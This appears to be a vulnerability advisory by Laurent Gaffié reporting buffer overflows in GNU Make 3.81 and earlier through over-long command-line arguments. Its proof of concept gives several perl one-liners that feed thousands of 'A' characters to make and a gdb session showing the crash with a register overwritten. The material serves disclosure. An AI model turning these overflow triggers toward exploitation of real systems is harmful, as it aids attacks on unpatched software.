----------------------------------------------------------------------------------------------------------------------------------------------------- Application: Make <= 3.81 Web Site: http://savannah.gnu.org/projects/make/ & http://www.gnu.org/software/make/ Platform: Unix Bug:multiple buffer overflow ------------------------------------------------------- 1) Introduction 2) Bug 3) Proof of concept 4) Greets 5) Credits =========== 1) Introduction =========== Make is a tool which controls the generation of executables and other non-source files of a program from the program's source files. Make gets its knowledge of how to build your program from a file called the makefile, which lists each of the non-source files and how to compute it from other files. When you write a program, you should write a makefile for it, so that it is possible to use Make to build and install the program. ====== 2) Bug ====== Make doesn't filter any value submitted by cmd line, then it is possible to trigger some exploitable buffer overflow ===== 3)Proof of concept ===== Proof of concept example : make `perl -e 'print"A"x4096'` //*** make -f `perl -e 'print"A"x4096'` make -j `perl -e 'print"A"x4096'` make -i `perl -e 'print"A"x4096'` make -l `perl -e 'print"A"x4096'` *** depending the case , you'll need to change the value , for a couple of more A , playing by hundred should be good to make sure you trigger it root@debian:~# gdb make GNU gdb 6.6-debian Copyright (C) 2006 Free Software Foundation, Inc. ................. .......... ... (gdb) run `perl -e 'print"A"x4296'`//my GCC version have a protection for stack smashing then 200 chars more , and we trigger it Starting program: /usr/bin/make `perl -e 'print"A"x4296'` (no debugging symbols found) (no debugging symbols found) (no debugging symbols found) (no debugging symbols found) (no debugging symbols found) [Thread debugging using libthread_db enabled] [New Thread -1209637200 (LWP 1246)] make: stat: AAAAAAAAAAAAAAAAAAAAAAAA....AAAAAAA AAAAA.........AAAAAAAAAA.... Program received signal SIGSEGV, Segmentation fault. [Switching to Thread -1209637200 (LWP 1246)] 0x08052ac5 in ?? () (gdb) i r eax 0xbfffa930 -1073764048 ecx 0x0 0 edx 0x0 0 ebx 0x41414141 1094795585 //got overwritted here esp 0xbfff8570 0xbfff8570 ebp 0xbfffa918 0xbfffa918 esi 0x80868f8 134768888 edi 0x8081560 134747488 eip 0x8052ac5 0x8052ac5 <exit@plt+36461> eflags 0x10206 [ PF IF RF ] cs 0x73 115 ss 0x7b 123 ds 0x7b 123 es 0x7b 123 fs 0x0 0 gs 0x33 51 (gdb) ======== 4)Greets ======== Deimos,Benjilenoob,team soh, #futurezone, #soh #nibbles ===== 5)Credits ===== Laurent Gaffi